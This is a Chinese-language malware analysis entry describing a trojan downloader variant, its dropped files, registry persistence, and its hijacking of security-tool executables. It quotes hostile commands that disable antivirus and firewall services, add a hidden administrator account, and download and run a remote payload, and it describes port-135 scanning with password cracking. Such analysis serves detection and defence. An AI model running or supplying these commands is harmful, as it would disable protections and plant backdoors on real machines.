基本介紹
- 中文名:肉雞獵人變種
- 外文名:Win32.Troj.Downloader.vb.81920
- 病毒類型:木馬下載器
- 病毒長度:81920
簡介,描述,
簡介
病毒名:Win32.Troj.Downloader.vb.81920
病毒類型: 木馬下載器
病毒長度: 81920
影響系統:Win9x,WinMe,Linux
釋放病毒檔案:C:Por.aed
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.I。E52PF3QNZECA05MZGT.htm
描述
1.釋放病毒檔案
C:Por.aed
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent。IE52PF3QNZECA05MZGT.htm
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.。IE5C4DGV5NIgx[1].jpg
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.。IE5R146ZVU7
otepde[1].jpg
C:Program Files360safesafemonsafemes.dll
C:WINDOWSSoundMan.exe
C:WINDOWSsystem32interne.exe
C:WINDOWSsystem32Man.exe
C:WINDOWSsystem32
o1.ini
C:WINDOWSsystem32
ote2.ini
C:WINDOWSsystem32
otepde.exe
C:WINDOWSsystem32qoq.exe
C:WINDOWSsystem32 tjj5.ini
2.創建服務並開啟來載入檔案,使其隨系統啟動
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSoundMan SoundMan.exe
鏡象劫持為"Debugger"="svchost.exe" 添加ctfmon.exe為"Debugger"="SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe Debugger "SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe Debugger "svchost.exe"
.
.
.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe Debugger "svchost.exe"
修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerAdvancedFolderHiddenSHOWALL不顯示隱藏檔案
刪除安全軟體的啟動項
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray
3.病毒生成檔案中的網址由解密字元串得到
CA05MZGT.htm
gx[1].jpg
notepde[1].jpg
4.枚舉進程
判斷當前進程里是否有"fint2005.exe" "ehsniffer.exe" "iris.exe" 嗅探工具,不管有無都等待10分鐘,連線網路
InternetOpenUrlA讀取InternetReadFile http://xxxxxxxx.。com/rc/1500/gx[1].txt裡面的列表,下載http://xxxxxx。com/rc/1500/gx[1].jpg
到c:\windowssystem32vbb.exe運行
"cacls.exe C:WINDOWSsystem32cmd.exe /e /t /g everyone:F"給everyone用戶組(就是所有人)對cmd.exe的完全控制,
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc
start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"
停止安全軟體的服務。
5.搜尋進程中是否含有kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe
360safe.exe 360tray.exe cacls.exe ccenter.exe 用TerminateProcess來結束
6."cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators /add
添加一個new1管理員帳號密碼12369,將這些信息寫入%windir%1.inf,然後調用rundll32.exe來修改Help and Support服務
C:WINDOWSsystem32interne.exe,並刪除1.inf.關閉臨時登入用戶new1
"HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
ew1"添加建值為0,(1為開啟)
不能創建刪除用戶"cmd.exe /c net user new1 /del"
7.訪問"http://webipcha。cn/ip/ip.asp"獲取當前外網IP,"cmd /c route print|find "Default Gateway: ">c:ip.txt"
獲取網關地址到c:ip.txt,然後從檔案重讀出網關地址,刪除檔案。
8.判斷當前進程有沒有avp.exe 有了修改日期2001年7月15日
9.釋放掃描器qoq.exe(Dotpot PortReady Ver1.6) 到%windir%/system32/下,掃描網關上下C段的所有135連線埠開放的主機,
記錄到Por.aed,掃描外網C段上4個段位的ip ,"cmd.exe /c move "c:Por.aed" "%SystemRoot%system32Por.aed"&exit"
10.釋放popo.exe到病毒運行當前目錄讀取Por.aed掃描出來的開135的IP位址 "cmd.exe /c start C:\popo.exe ip &exit"
(如cmd.exe /c start C:\popo.exe 192.1**.18.15 &exit 通過POPO.EXE進行掃字典密碼破解)
11.掃描完畢刪除qoq.exe, Por.aed, popo.exe
